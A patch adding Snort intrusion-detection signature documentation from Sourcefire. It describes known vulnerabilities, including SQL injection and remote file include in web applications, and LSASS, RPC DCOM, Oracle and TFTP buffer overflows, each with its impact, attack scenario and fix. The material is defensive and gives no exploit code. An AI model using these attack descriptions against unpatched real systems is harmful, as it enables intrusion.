@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1064
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000698.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000698
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "BXCP" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "where" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "where" parameter in the "index.php" script used by the "BXCP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BXCP
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/991.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+991
+
+
+--
+Summary:
+This event is generated when an attempt is made to request an HTTP-based password change.
+
+--
+Impact:
+Information gathering/remote access.  Error messages from failed password changes can indicate whether a given account exists on the server.  Successful password changes can allow remote access to the server. 
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote password changes.  The iisadmpwd directory has several .HTR files that are used to implement the password changes.  An attacker can request a change and use a returned form to supply an account name, existing password, and new password either to brute force changes or discover whether a specific account name exist. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0
+
+--
+Attack Scenarios:
+An attacker can request password changes to discover existing accounts or brute force password changes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
--- /dev/null
+++ b/doc/signatures/1680.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1680
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2076.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2076
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Mambo Site Server.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
--- /dev/null
+++ b/doc/signatures/1643.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1643
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000739.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000739
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "IPofUrl.Examine.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "IPofUrl.Examine.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1115.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1115
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3050.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3050
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1148.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1148
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2253.txt
@@ -0,0 +1,73 @@
+Rule:  
+
+--
+Sid:
+2253
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Serious. Possible execution of arbitrary code and Denial of Service
+(DoS).
+
+--
+Detailed Information:
+A vulnerability exists in versions of Microsoft Exchange Server such
+that it is possible for an attacker to execute arbitrary code or cause a
+DoS condition on the server without the need for prior authentication as
+a valid user.
+
+It is possible for an attacker to connect to the Exchange server on port
+25 and send an extended verb request to the server that will cause a
+large amount of memory to be allocated. In Exchange Server 5.5 this may
+cause a DoS, whilst in Exchange Server 2000 this same condition could
+present the attacker with an opportunity to execute arbitrary code.
+
+--
+Affected Systems:
+	MIcrosoft Exchange Server 5.5
+	Microsoft Exchange Server 2000
+
+--
+Attack Scenarios:
+The attacker can connect to port 25 of the server and send a specially
+crafted verb request.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Corp.
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-046.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0714
+
+--
--- /dev/null
+++ b/doc/signatures/1533.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1533
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2612.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2612
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "revoke_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000524.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000524
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Micro CMS" application running on a webserver. 
+Access to the file "microcms-include.php" using a remote file being passed as 
+the "microcms_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "microcms_path" parameter in the "microcms-include.php" 
+script used by the "Micro CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Micro CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2052.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2052
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Sun Cobalt RaQ server appliances.
+
+--
+Impact:
+Execution of code and possible root compromise of the system.
+
+--
+Detailed Information:
+A vulnerability in the security hardening package for Sun Cobalt RaQ 4 
+and RaQ 3 running RaQ 4 does not filter user input to the email variable
+in the overflow.cgi script correctly.
+
+POST requests to the script may contain code in the email variable which
+will then be processed with the privilege of the super user on the 
+system.
+
+--
+Affected Systems:
+Sun Cobalt RaQ 4 Server Appliances with the Security Hardening Package 
+installed
+Sun Cobalt RaQ 3 Server Appliances running the RaQ 4 build with the 
+Security Hardening Package installed
+
+--
+Attack Scenarios:
+An attacker can supply his own POST request to the overflow.cgi script 
+that contains code he wishes to run.
+
+An exploit is also available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/810921
+http://www.cert.org/advisories/CA-2002-35.html
+
+--
--- /dev/null
+++ b/doc/signatures/1492.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1492
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2513.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2513
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2541.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2541
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2325.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a
+server. It may be possible to use SQL injection techniques to supply
+SQL code of an attackers choosing to the database used in the
+application.
+
+--
+Affected Systems:
+	Virtual Programming VP-ASP 4.0
+	Virtual Programming VP-ASP 5.0
+
+--
+Attack Scenarios:
+An attacker can inject SQL code of their choosing to view and manipulate
+data stored in the underlying database used by the application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3261.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3261
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1941.txt
@@ -0,0 +1,184 @@
+Rule:
+
+--
+Sid:
+1941
+
+--
+Summary:
+This event is generated by an attempt to exploit a buffer overflow in TFTP file handling routines.
+
+--
+Impact:
+Implementation Dependent.  Several implementations of TFTP are vulnerable to a
+buffer overflow when processing long TFTP get requests.  This could allow
+arbitrary code execution or result in a Denial of Service condition.
+
+--
+Detailed Information:
+Insufficient bounds checking on requested filenames results in a simple to
+exploit buffer overflow condition.  This condition can be exploited by making
+a request for an overly long file name.
+
+Affected Systems:
+	Cisco IOS 11.1
+	Cisco IOS 11.2
+	Cisco IOS 11.3
+	ATFTP 0.6.0 and 0.6.1.1
+
+--
+Attack Scenarios:
+Attackers with access to TFTP can exploit this condition remotely by
+requesting an overly long file name.
+
+--
+Ease of Attack
+Depending on the configuration of the TFTP server this vulnerability can be exploited with a simple script.  Currently several exploits exist in the wild.
+
+--
+False Positives:
+Requests for legitimate file names of 100 or more bytes will trigger this rule. 
+
+--
+False Negatives
+Currently this rule checks for the existance of a file name of 100 or more bytes.  Vulnerable TFTP implemenations that experience faults with file names less than 100 bytes will not trigger this rule.
+
+--
+Corrective Action
+Cisco:
